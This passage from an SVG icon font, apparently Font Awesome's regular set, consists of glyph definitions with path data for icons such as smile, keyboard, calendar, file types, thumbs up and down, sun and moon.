v-88h88c6.59961 0 12 -5.40039 12 -12zM448 368v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352c26.5 0 48 -21.5 48 -48zM400 22v340c0 3.2998 -2.7002 6 -6 6h-340c-3.2998 0 -6 -2.7002 -6 -6v-340
c0 -3.2998 2.7002 -6 6 -6h340c3.2998 0 6 2.7002 6 6z" />
    <glyph glyph-name="circle" unicode="&#xf111;" 
d="M256 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM256 -8c110.5 0 200 89.5 200 200s-89.5 200 -200 200s-200 -89.5 -200 -200s89.5 -200 200 -200z" />
    <glyph glyph-name="smile" unicode="&#xf118;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM168 208c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32
s32 -14.2998 32 -32s-14.2998 -32 -32 -32zM328 208c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32s32 -14.2998 32 -32s-14.2998 -32 -32 -32zM332 135.4c8.5 10.1992 23.7002 11.5 33.7998 3.09961c10.2002 -8.5 11.6006 -23.5996 3.10059 -33.7998
c-30 -36 -74.1006 -56.6006 -120.9 -56.6006s-90.9004 20.6006 -120.9 56.6006c-8.39941 10.2002 -7.09961 25.2998 3.10059 33.7998c10.0996 8.40039 25.2998 7.09961 33.7998 -3.09961c20.7998 -25.1006 51.5 -39.4004 84 -39.4004s63.2002 14.4004 84 39.4004z" />
    <glyph glyph-name="frown" unicode="&#xf119;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM168 208c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32
s32 -14.2998 32 -32s-14.2998 -32 -32 -32zM328 272c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32s-32 14.2998 -32 32s14.2998 32 32 32zM248 144c40.2002 0 78 -17.7002 103.8 -48.5996c8.40039 -10.2002 7.10059 -25.3008 -3.09961 -33.8008
c-10.7002 -8.7998 -25.7002 -6.59961 -33.7998 3.10059c-16.6006 20 -41 31.3994 -66.9004 31.3994s-50.2998 -11.5 -66.9004 -31.3994c-8.5 -10.2002 -23.5996 -11.5 -33.7998 -3.10059c-10.2002 8.5 -11.5996 23.6006 -3.09961 33.8008
c25.7998 30.8994 63.5996 48.5996 103.8 48.5996z" />
    <glyph glyph-name="meh" unicode="&#xf11a;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM168 208c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32
s32 -14.2998 32 -32s-14.2998 -32 -32 -32zM328 272c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32s-32 14.2998 -32 32s14.2998 32 32 32zM336 128c13.2002 0 24 -10.7998 24 -24s-10.7998 -24 -24 -24h-176c-13.2002 0 -24 10.7998 -24 24s10.7998 24 24 24h176z
" />
    <glyph glyph-name="keyboard" unicode="&#xf11c;" horiz-adv-x="576" 
d="M528 384c26.5098 0 48 -21.4902 48 -48v-288c0 -26.5098 -21.4902 -48 -48 -48h-480c-26.5098 0 -48 21.4902 -48 48v288c0 26.5098 21.4902 48 48 48h480zM536 48v288c0 4.41113 -3.58887 8 -8 8h-480c-4.41113 0 -8 -3.58887 -8 -8v-288c0 -4.41113 3.58887 -8 8 -8
h480c4.41113 0 8 3.58887 8 8zM170 178c0 -6.62695 -5.37305 -12 -12 -12h-28c-6.62695 0 -12 5.37305 -12 12v28c0 6.62695 5.37305 12 12 12h28c6.62695 0 12 -5.37305 12 -12v-28zM266 178c0 -6.62695 -5.37305 -12 -12 -12h-28c-6.62695 0 -12 5.37305 -12 12v28
c0 6.62695 5.37305 12 12 12h28c6.62695 0 12 -5.37305 12 -12v-28zM362 178c0 -6.62695 -5.37305 -12 -12 -12h-28c-6.62695 0 -12 5.37305 -12 12v28c0 6.62695 5.37305 12 12 12h28c6.62695 0 12 -5.37305 12 -12v-28zM458 178c0 -6.62695 -5.37305 -12 -12 -12h-28
c-6.62695 0 -12 5.37305 -12 12v28c0 6.62695 5.37305 12 12 12h28c6.62695 0 12 -5.37305 12 -12v-28zM122 96c0 -6.62695 -5.37305 -12 -12 -12h-28c-6.62695 0 -12 5.37305 -12 12v28c0 6.62695 5.37305 12 12 12h28c6.62695 0 12 -5.37305 12 -12v-28zM506 96
c0 -6.62695 -5.37305 -12 -12 -12h-28c-6.62695 0 -12 5.37305 -12 12v28c0 6.62695 5.37305 12 12 12h28c6.62695 0 12 -5.37305 12 -12v-28zM122 260c0 -6.62695 -5.37305 -12 -12 -12h-28c-6.62695 0 -12 5.37305 -12 12v28c0 6.62695 5.37305 12 12 12h28
c6.62695 0 12 -5.37305 12 -12v-28zM218 260c0 -6.62695 -5.37305 -12 -12 -12h-28c-6.62695 0 -12 5.37305 -12 12v28c0 6.62695 5.37305 12 12 12h28c6.62695 0 12 -5.37305 12 -12v-28zM314 260c0 -6.62695 -5.37305 -12 -12 -12h-28c-6.62695 0 -12 5.37305 -12 12v28
c0 6.62695 5.37305 12 12 12h28c6.62695 0 12 -5.37305 12 -12v-28zM410 260c0 -6.62695 -5.37305 -12 -12 -12h-28c-6.62695 0 -12 5.37305 -12 12v28c0 6.62695 5.37305 12 12 12h28c6.62695 0 12 -5.37305 12 -12v-28zM506 260c0 -6.62695 -5.37305 -12 -12 -12h-28
c-6.62695 0 -12 5.37305 -12 12v28c0 6.62695 5.37305 12 12 12h28c6.62695 0 12 -5.37305 12 -12v-28zM408 102c0 -6.62695 -5.37305 -12 -12 -12h-216c-6.62695 0 -12 5.37305 -12 12v16c0 6.62695 5.37305 12 12 12h216c6.62695 0 12 -5.37305 12 -12v-16z" />
    <glyph glyph-name="calendar" unicode="&#xf133;" horiz-adv-x="448" 
d="M400 384c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h48v52c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-52h128v52c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12
v-52h48zM394 -16c3.2998 0 6 2.7002 6 6v298h-352v-298c0 -3.2998 2.7002 -6 6 -6h340z" />
    <glyph glyph-name="play-circle" unicode="&#xf144;" 
d="M371.7 210c16.3994 -9.2002 16.3994 -32.9004 0 -42l-176 -101c-15.9004 -8.7998 -35.7002 2.59961 -35.7002 21v208c0 18.5 19.9004 29.7998 35.7002 21zM504 192c0 -137 -111 -248 -248 -248s-248 111 -248 248s111 248 248 248s248 -111 248 -248zM56 192
c0 -110.5 89.5 -200 200 -200s200 89.5 200 200s-89.5 200 -200 200s-200 -89.5 -200 -200z" />
    <glyph glyph-name="minus-square" unicode="&#xf146;" horiz-adv-x="448" 
d="M108 164c-6.59961 0 -12 5.40039 -12 12v32c0 6.59961 5.40039 12 12 12h232c6.59961 0 12 -5.40039 12 -12v-32c0 -6.59961 -5.40039 -12 -12 -12h-232zM448 368v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352
c26.5 0 48 -21.5 48 -48zM400 22v340c0 3.2998 -2.7002 6 -6 6h-340c-3.2998 0 -6 -2.7002 -6 -6v-340c0 -3.2998 2.7002 -6 6 -6h340c3.2998 0 6 2.7002 6 6z" />
    <glyph glyph-name="check-square" unicode="&#xf14a;" horiz-adv-x="448" 
d="M400 416c26.5098 0 48 -21.4902 48 -48v-352c0 -26.5098 -21.4902 -48 -48 -48h-352c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h352zM400 16v352h-352v-352h352zM364.136 257.724l-172.589 -171.204
c-4.70508 -4.66699 -12.3027 -4.63672 -16.9697 0.0683594l-90.7812 91.5156c-4.66699 4.70508 -4.63672 12.3037 0.0693359 16.9717l22.7188 22.5361c4.70508 4.66699 12.3027 4.63672 16.9697 -0.0693359l59.792 -60.2773l141.353 140.217
c4.70508 4.66699 12.3027 4.63672 16.9697 -0.0683594l22.5361 -22.7178c4.66699 -4.70605 4.63672 -12.3047 -0.0683594 -16.9717z" />
    <glyph glyph-name="share-square" unicode="&#xf14d;" horiz-adv-x="576" 
d="M561.938 289.94c18.75 -18.7402 18.75 -49.1406 0 -67.8809l-143.998 -144c-29.9727 -29.9727 -81.9404 -9.05273 -81.9404 33.9404v53.7998c-101.266 -7.83691 -99.625 -31.6406 -84.1104 -78.7598c14.2285 -43.0889 -33.4736 -79.248 -71.0195 -55.7402
c-51.6924 32.3057 -84.8701 83.0635 -84.8701 144.76c0 39.3408 12.2197 72.7402 36.3301 99.3008c19.8398 21.8398 47.7402 38.4697 82.9102 49.4199c36.7295 11.4395 78.3096 16.1094 120.76 17.9893v57.1982c0 42.9355 51.9258 63.9541 81.9404 33.9404zM384 112l144 144
l-144 144v-104.09c-110.86 -0.90332 -240 -10.5166 -240 -119.851c0 -52.1396 32.79 -85.6094 62.3096 -104.06c-39.8174 120.65 48.999 141.918 177.69 143.84v-103.84zM408.74 27.5068c6.14844 1.75684 15.5449 5.92383 20.9736 9.30273
c7.97656 4.95215 18.2861 -0.825195 18.2861 -10.2139v-42.5957c0 -26.5098 -21.4902 -48 -48 -48h-352c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h132c6.62695 0 12 -5.37305 12 -12v-4.48633c0 -4.91699 -2.9873 -9.36914 -7.56934 -11.1514
c-13.7021 -5.33105 -26.3955 -11.5371 -38.0498 -18.585c-1.59668 -0.974609 -4.41016 -1.77051 -6.28027 -1.77734h-86.1006c-3.31152 0 -6 -2.68848 -6 -6v-340c0 -3.31152 2.68848 -6 6 -6h340c3.31152 0 6 2.68848 6 6v25.9658c0 5.37012 3.5791 10.0596 8.74023 11.541
z" />
    <glyph glyph-name="compass" unicode="&#xf14e;" horiz-adv-x="496" 
d="M347.94 318.14c16.6592 7.61035 33.8096 -9.54004 26.1992 -26.1992l-65.9697 -144.341c-2.73047 -5.97363 -9.7959 -13.0391 -15.7695 -15.7695l-144.341 -65.9697c-16.6592 -7.61035 -33.8096 9.5498 -26.1992 26.1992l65.9697 144.341
c2.73047 5.97363 9.7959 13.0391 15.7695 15.7695zM270.58 169.42c12.4697 12.4697 12.4697 32.6904 0 45.1602s-32.6904 12.4697 -45.1602 0s-12.4697 -32.6904 0 -45.1602s32.6904 -12.4697 45.1602 0zM248 440c136.97 0 248 -111.03 248 -248s-111.03 -248 -248 -248
s-248 111.03 -248 248s111.03 248 248 248zM248 -8c110.28 0 200 89.7197 200 200s-89.7197 200 -200 200s-200 -89.7197 -200 -200s89.7197 -200 200 -200z" />
    <glyph glyph-name="caret-square-down" unicode="&#xf150;" horiz-adv-x="448" 
d="M125.1 240h197.801c10.6992 0 16.0996 -13 8.5 -20.5l-98.9004 -98.2998c-4.7002 -4.7002 -12.2002 -4.7002 -16.9004 0l-98.8994 98.2998c-7.7002 7.5 -2.2998 20.5 8.39941 20.5zM448 368v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352
c0 26.5 21.5 48 48 48h352c26.5 0 48 -21.5 48 -48zM400 22v340c0 3.2998 -2.7002 6 -6 6h-340c-3.2998 0 -6 -2.7002 -6 -6v-340c0 -3.2998 2.7002 -6 6 -6h340c3.2998 0 6 2.7002 6 6z" />
    <glyph glyph-name="caret-square-up" unicode="&#xf151;" horiz-adv-x="448" 
d="M322.9 144h-197.801c-10.6992 0 -16.0996 13 -8.5 20.5l98.9004 98.2998c4.7002 4.7002 12.2002 4.7002 16.9004 0l98.8994 -98.2998c7.7002 -7.5 2.2998 -20.5 -8.39941 -20.5zM448 368v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352
c0 26.5 21.5 48 48 48h352c26.5 0 48 -21.5 48 -48zM400 22v340c0 3.2998 -2.7002 6 -6 6h-340c-3.2998 0 -6 -2.7002 -6 -6v-340c0 -3.2998 2.7002 -6 6 -6h340c3.2998 0 6 2.7002 6 6z" />
    <glyph glyph-name="caret-square-right" unicode="&#xf152;" horiz-adv-x="448" 
d="M176 93.0996v197.801c0 10.6992 13 16.0996 20.5 8.5l98.2998 -98.9004c4.7002 -4.7002 4.7002 -12.2002 0 -16.9004l-98.2998 -98.8994c-7.5 -7.7002 -20.5 -2.2998 -20.5 8.39941zM448 368v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352
c0 26.5 21.5 48 48 48h352c26.5 0 48 -21.5 48 -48zM400 22v340c0 3.2998 -2.7002 6 -6 6h-340c-3.2998 0 -6 -2.7002 -6 -6v-340c0 -3.2998 2.7002 -6 6 -6h340c3.2998 0 6 2.7002 6 6z" />
    <glyph glyph-name="file" unicode="&#xf15b;" horiz-adv-x="384" 
d="M369.9 350.1c9 -9 14.0996 -21.2998 14.0996 -34v-332.1c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48.0996h204.1c12.7002 0 24.9004 -5.09961 33.9004 -14.0996zM332.1 320l-76.0996 76.0996v-76.0996h76.0996zM48 -16h288v288
h-104c-13.2998 0 -24 10.7002 -24 24v104h-160v-416z" />
    <glyph glyph-name="file-alt" unicode="&#xf15c;" horiz-adv-x="384" 
d="M288 200v-28c0 -6.59961 -5.40039 -12 -12 -12h-168c-6.59961 0 -12 5.40039 -12 12v28c0 6.59961 5.40039 12 12 12h168c6.59961 0 12 -5.40039 12 -12zM276 128c6.59961 0 12 -5.40039 12 -12v-28c0 -6.59961 -5.40039 -12 -12 -12h-168c-6.59961 0 -12 5.40039 -12 12
v28c0 6.59961 5.40039 12 12 12h168zM384 316.1v-332.1c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48h204.1c12.7002 0 24.9004 -5.09961 33.9004 -14.0996l83.9004 -83.9004c9 -8.90039 14.0996 -21.2002 14.0996 -33.9004z
M256 396.1v-76.0996h76.0996zM336 -16v288h-104c-13.2998 0 -24 10.7002 -24 24v104h-160v-416h288z" />
    <glyph glyph-name="thumbs-up" unicode="&#xf164;" horiz-adv-x="480" 
d="M466.27 161.31c4.6748 -22.6465 0.864258 -44.5371 -8.98926 -62.9893c2.95898 -23.8682 -4.02148 -48.5654 -17.3398 -66.9902c-0.954102 -55.9072 -35.8232 -95.3301 -112.94 -95.3301c-7 0 -15 0.00976562 -22.2197 0.00976562
c-102.742 0 -133.293 38.9395 -177.803 39.9404c-3.56934 -13.7764 -16.085 -23.9502 -30.9775 -23.9502h-64c-17.6729 0 -32 14.3271 -32 32v240c0 17.6729 14.3271 32 32 32h98.7598c19.1455 16.9531 46.0137 60.6533 68.7598 83.4004
c13.667 13.667 10.1533 108.6 71.7607 108.6c57.5801 0 95.2695 -31.9355 95.2695 -104.73c0 -18.4092 -3.92969 -33.7295 -8.84961 -46.5391h36.4795c48.6025 0 85.8203 -41.5654 85.8203 -85.5801c0 -19.1504 -4.95996 -34.9902 -13.7305 -49.8408zM404.52 107.48
c21.5811 20.3838 18.6992 51.0645 5.21094 65.6191c9.44922 0 22.3594 18.9102 22.2695 37.8105c-0.0898438 18.9102 -16.71 37.8203 -37.8203 37.8203h-103.989c0 37.8193 28.3594 55.3691 28.3594 94.5391c0 23.75 0 56.7305 -47.2695 56.7305
c-18.9102 -18.9102 -9.45996 -66.1797 -37.8203 -94.54c-26.5596 -26.5703 -66.1797 -97.46 -94.54 -97.46h-10.9199v-186.17c53.6113 0 100.001 -37.8203 171.64 -37.8203h37.8203c35.5117 0 60.8203 17.1201 53.1201 65.9004
c15.2002 8.16016 26.5 36.4395 13.9395 57.5703zM88 16c0 13.2549 -10.7451 24 -24 24s-24 -10.7451 -24 -24s10.7451 -24 24 -24s24 10.7451 24 24z" />
    <glyph glyph-name="thumbs-down" unicode="&#xf165;" horiz-adv-x="480" 
d="M466.27 222.69c8.77051 -14.8506 13.7305 -30.6904 13.7305 -49.8408c0 -44.0146 -37.2178 -85.5801 -85.8203 -85.5801h-36.4795c4.91992 -12.8096 8.84961 -28.1299 8.84961 -46.5391c0 -72.7949 -37.6895 -104.73 -95.2695 -104.73
c-61.6074 0 -58.0938 94.9326 -71.7607 108.6c-22.7461 22.7471 -49.6133 66.4473 -68.7598 83.4004h-7.05176c-5.5332 -9.56152 -15.8662 -16 -27.708 -16h-64c-17.6729 0 -32 14.3271 -32 32v240c0 17.6729 14.3271 32 32 32h64c8.11328 0 15.5146 -3.02539 21.1553 -8
h10.8447c40.9971 0 73.1953 39.9902 176.78 39.9902c7.21973 0 15.2197 0.00976562 22.2197 0.00976562c77.1172 0 111.986 -39.4229 112.94 -95.3301c13.3184 -18.4248 20.2979 -43.1221 17.3398 -66.9902c9.85352 -18.4521 13.6641 -40.3428 8.98926 -62.9893zM64 152
c13.2549 0 24 10.7451 24 24s-10.7451 24 -24 24s-24 -10.7451 -24 -24s10.7451 -24 24 -24zM394.18 135.27c21.1104 0 37.7305 18.9102 37.8203 37.8203c0.0898438 18.9004 -12.8203 37.8105 -22.2695 37.8105c13.4883 14.5547 16.3701 45.2354 -5.21094 65.6191
c12.5605 21.1309 1.26074 49.4102 -13.9395 57.5703c7.7002 48.7803 -17.6084 65.9004 -53.1201 65.9004h-37.8203c-71.6387 0 -118.028 -37.8203 -171.64 -37.8203v-186.17h10.9199c28.3604 0 67.9805 -70.8896 94.54 -97.46
c28.3604 -28.3604 18.9102 -75.6299 37.8203 -94.54c47.2695 0 47.2695 32.9805 47.2695 56.7305c0 39.1699 -28.3594 56.7197 -28.3594 94.5391h103.989z" />
    <glyph glyph-name="sun" unicode="&#xf185;" 
d="M494.2 226.1c11.2002 -7.59961 17.7998 -20.0996 17.8994 -33.6992c0 -13.4004 -6.69922 -26 -17.7998 -33.5l-59.7998 -40.5l13.7002 -71c2.5 -13.2002 -1.60059 -26.8008 -11.1006 -36.3008s-22.8994 -13.7998 -36.2998 -11.0996l-70.8994 13.7002l-40.4004 -59.9004
c-7.5 -11.0996 -20.0996 -17.7998 -33.5 -17.7998s-26 6.7002 -33.5 17.9004l-40.4004 59.8994l-70.7998 -13.7002c-13.3994 -2.59961 -26.7998 1.60059 -36.2998 11.1006s-13.7002 23.0996 -11.0996 36.2998l13.6992 71l-59.7998 40.5
c-11.0996 7.5 -17.7998 20 -17.7998 33.5s6.59961 26 17.7998 33.5996l59.7998 40.5l-13.6992 71c-2.60059 13.2002 1.59961 26.7002 11.0996 36.3008c9.5 9.59961 23 13.6992 36.2998 11.1992l70.7998 -13.6992l40.4004 59.8994c15.0996 22.2998 51.9004 22.2998 67 0
l40.4004 -59.8994l70.8994 13.6992c13 2.60059 26.6006 -1.59961 36.2002 -11.0996c9.5 -9.59961 13.7002 -23.2002 11.0996 -36.4004l-13.6992 -71zM381.3 140.5l76.7998 52.0996l-76.7998 52l17.6006 91.1006l-91 -17.6006l-51.9004 76.9004l-51.7998 -76.7998
l-91 17.5996l17.5996 -91.2002l-76.7998 -52l76.7998 -52l-17.5996 -91.1992l90.8994 17.5996l51.9004 -77l51.9004 76.9004l91 -17.6006zM256 296c57.2998 0 104 -46.7002 104 -104s-46.7002 -104 -104 -104s-104 46.7002 -104 104s46.7002 104 104 104zM256 136
c30.9004 0 56 25.0996 56 56s-25.0996 56 -56 56s-56 -25.0996 -56 -56s25.0996 -56 56 -56z" />
    <glyph glyph-name="moon" unicode="&#xf186;" horiz-adv-x="511" 
d="M279.135 -64c-141.424 0 -256 114.64 -256 256c0 141.425 114.641 256 256 256c13.0068 -0.00195312 33.9443 -1.91797 46.7354 -4.27734c44.0205 -8.13086 53.7666 -66.8691 15.0215 -88.9189c-41.374 -23.5439 -67.4336 -67.4121 -67.4336 -115.836
c0 -83.5234 75.9238 -146.475 158.272 -130.792c43.6904 8.32129 74.5186 -42.5693 46.248 -77.4004c-47.8613 -58.9717 -120.088 -94.7754 -198.844 -94.7754zM279.135 400c-114.875 0 -208 -93.125 -208 -208s93.125 -208 208 -208
c65.2314 0 123.439 30.0361 161.575 77.0244c-111.611 -21.2568 -215.252 64.0957 -215.252 177.943c0 67.5127 36.9326 126.392 91.6934 157.555c-12.3271 2.27637 -25.0312 3.47754 -38.0166 3.47754z" />
    <glyph glyph-name="caret-square-left" unicode="&#xf191;" horiz-adv-x="448" 
d="M272 290.9v-197.801c0 -10.6992 -13 -16.0996 -20.5 -8.5l-98.2998 98.9004c-4.7002 4.7002 -4.7002 12.2002 0 16.9004l98.2998 98.8994c7.5 7.7002 20.5 2.2998 20.5 -8.39941zM448 368v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352
c0 26.5 21.5 48 48 48h352c26.5 0 48 -21.5 48 -48zM400 22v340c0 3.2998 -2.7002 6 -6 6h-340c-3.2998 0 -6 -2.7002 -6 -6v-340c0 -3.2998 2.7002 -6 6 -6h340c3.2998 0 6 2.7002 6 6z" />
    <glyph glyph-name="dot-circle" unicode="&#xf192;" 
d="M256 392c-110.549 0 -200 -89.4678 -200 -200c0 -110.549 89.4678 -200 200 -200c110.549 0 200 89.4678 200 200c0 110.549 -89.4678 200 -200 200zM256 440c136.967 0 248 -111.033 248 -248s-111.033 -248 -248 -248s-248 111.033 -248 248s111.033 248 248 248z
M256 272c44.1826 0 80 -35.8174 80 -80s-35.8174 -80 -80 -80s-80 35.8174 -80 80s35.8174 80 80 80z" />
    <glyph glyph-name="building" unicode="&#xf1ad;" horiz-adv-x="448" 
d="M128 300v40c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12zM268 288c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-40
c0 -6.59961 -5.40039 -12 -12 -12h-40zM140 192c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-40zM268 192c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h40
c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-40zM192 108c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-40zM268 96c-6.59961 0 -12 5.40039 -12 12v40
c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-40zM448 -28v-36h-448v36c0 6.59961 5.40039 12 12 12h19.5v440c0 13.2998 10.7002 24 24 24h337c13.2998 0 24 -10.7002 24 -24v-440h19.5
c6.59961 0 12 -5.40039 12 -12zM79.5 -15h112.5v67c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-67h112.5v414l-288.5 1z" />
    <glyph glyph-name="file-pdf" unicode="&#xf1c1;" horiz-adv-x="384" 
d="M369.9 350.1c9 -9 14.0996 -21.2998 14.0996 -34v-332.1c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48.0996h204.1c12.7002 0 24.9004 -5.09961 33.9004 -14.0996zM332.1 320l-76.0996 76.0996v-76.0996h76.0996zM48 -16h288v288
h-104c-13.2998 0 -24 10.7002 -24 24v104h-160v-416zM298.2 127.7c10.5 -10.5 8 -38.7002 -17.5 -38.7002c-14.7998 0 -36.9004 6.7998 -55.7998 17c-21.6006 -3.59961 -46 -12.7002 -68.4004 -20.0996c-50.0996 -86.4004 -79.4004 -47 -76.0996 -31.2002
c4 20 31 35.8994 51 46.2002c10.5 18.3994 25.3994 50.5 35.3994 74.3994c-7.39941 28.6006 -11.3994 51 -7 67.1006c4.7998 17.6992 38.4004 20.2998 42.6006 -5.90039c4.69922 -15.4004 -1.5 -39.9004 -5.40039 -56c8.09961 -21.2998 19.5996 -35.7998 36.7998 -46.2998
c17.4004 2.2002 52.2002 5.5 64.4004 -6.5zM100.1 49.9004c0 -0.700195 11.4004 4.69922 30.4004 35c-5.90039 -5.5 -25.2998 -21.3008 -30.4004 -35zM181.7 240.5c-2.5 0 -2.60059 -26.9004 1.7998 -40.7998c4.90039 8.7002 5.59961 40.7998 -1.7998 40.7998zM157.3 103.9
c15.9004 6.09961 34 14.8994 54.7998 19.1992c-11.1992 8.30078 -21.7998 20.4004 -30.0996 35.5c-6.7002 -17.6992 -15 -37.7998 -24.7002 -54.6992zM288.9 108.9c3.59961 2.39941 -2.2002 10.3994 -37.3008 7.7998c32.3008 -13.7998 37.3008 -7.7998 37.3008 -7.7998z" />
    <glyph glyph-name="file-word" unicode="&#xf1c2;" horiz-adv-x="384" 
d="M369.9 350.1c9 -9 14.0996 -21.2998 14.0996 -34v-332.1c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48.0996h204.1c12.7002 0 24.9004 -5.09961 33.9004 -14.0996zM332.1 320l-76.0996 76.0996v-76.0996h76.0996zM48 -16h288v288
h-104c-13.2998 0 -24 10.7002 -24 24v104h-160v-416zM268.1 192v0.200195h15.8008c7.7998 0 13.5 -7.2998 11.5996 -14.9004c-4.2998 -17 -13.7002 -54.0996 -34.5 -136c-1.2998 -5.39941 -6.09961 -9.09961 -11.5996 -9.09961h-24.7002
c-5.5 0 -10.2998 3.7998 -11.6006 9.09961c-5.2998 20.9004 -17.7998 71 -17.8994 71.4004l-2.90039 17.2998c-0.5 -5.2998 -1.5 -11.0996 -3 -17.2998l-17.8994 -71.4004c-1.30078 -5.39941 -6.10059 -9.09961 -11.6006 -9.09961h-25.2002
c-5.59961 0 -10.3994 3.7002 -11.6992 9.09961c-6.5 26.5 -25.2002 103.4 -33.2002 136c-1.7998 7.5 3.89941 14.7998 11.7002 14.7998h16.7998c5.7998 0 10.7002 -4.09961 11.7998 -9.69922c5 -25.7002 18.4004 -93.8008 19.0996 -99
c0.300781 -1.7002 0.400391 -3.10059 0.5 -4.2002c0.800781 7.5 0.400391 4.7002 24.8008 103.7c1.39941 5.2998 6.19922 9.09961 11.6992 9.09961h13.3008c5.59961 0 10.3994 -3.7998 11.6992 -9.2002c23.9004 -99.7002 22.8008 -94.3994 23.6006 -99.5
c0.299805 -1.7002 0.5 -3.09961 0.700195 -4.2998c0.599609 8.09961 0.399414 5.7998 21 103.5c1.09961 5.5 6 9.5 11.6992 9.5z" />
    <glyph glyph-name="file-excel" unicode="&#xf1c3;" horiz-adv-x="384" 
d="M369.9 350.1c9 -9 14.0996 -21.2998 14.0996 -34v-332.1c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48.0996h204.1c12.7002 0 24.9004 -5.09961 33.9004 -14.0996zM332.1 320l-76.0996 76.0996v-76.0996h76.0996zM48 -16h288v288
h-104c-13.2998 0 -24 10.7002 -24 24v104h-160v-416zM260 224c9.2002 0 15 -10 10.2998 -18c-16 -27.5 -45.5996 -76.9004 -46.2998 -78l46.4004 -78c4.59961 -8 -1.10059 -18 -10.4004 -18h-28.7998c-4.40039 0 -8.5 2.40039 -10.6006 6.2998
c-22.6992 41.7998 -13.6992 27.5 -28.5996 57.7002c-5.59961 -12.7002 -6.90039 -17.7002 -28.5996 -57.7002c-2.10059 -3.89941 -6.10059 -6.2998 -10.5 -6.2998h-28.9004c-9.2998 0 -15.0996 10 -10.4004 18l46.3008 78l-46.3008 78c-4.59961 8 1.10059 18 10.4004 18
h28.9004c4.39941 0 8.5 -2.40039 10.5996 -6.2998c21.7002 -40.4004 14.7002 -28.6006 28.5996 -57.7002c6.40039 15.2998 10.6006 24.5996 28.6006 57.7002c2.09961 3.89941 6.09961 6.2998 10.5 6.2998h28.7998z" />
    <glyph glyph-name="file-powerpoint" unicode="&#xf1c4;" horiz-adv-x="384" 
d="M369.9 350.1c9 -9 14.0996 -21.2998 14.0996 -34v-332.1c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48.0996h204.1c12.7002 0 24.9004 -5.09961 33.9004 -14.0996zM332.1 320l-76.0996 76.0996v-76.0996h76.0996zM48 -16h288v288
h-104c-13.2998 0 -24 10.7002 -24 24v104h-160v-416zM120 44v168c0 6.59961 5.40039 12 12 12h69.2002c36.7002 0 62.7998 -27 62.7998 -66.2998c0 -74.2998 -68.7002 -66.5 -95.5 -66.5v-47.2002c0 -6.59961 -5.40039 -12 -12 -12h-24.5c-6.59961 0 -12 5.40039 -12 12z
M168.5 131.4h23c7.90039 0 13.9004 2.39941 18.0996 7.19922c8.5 9.80078 8.40039 28.5 0.100586 37.8008c-4.10059 4.59961 -9.90039 7 -17.4004 7h-23.8994v-52h0.0996094z" />
    <glyph glyph-name="file-image" unicode="&#xf1c5;" horiz-adv-x="384" 
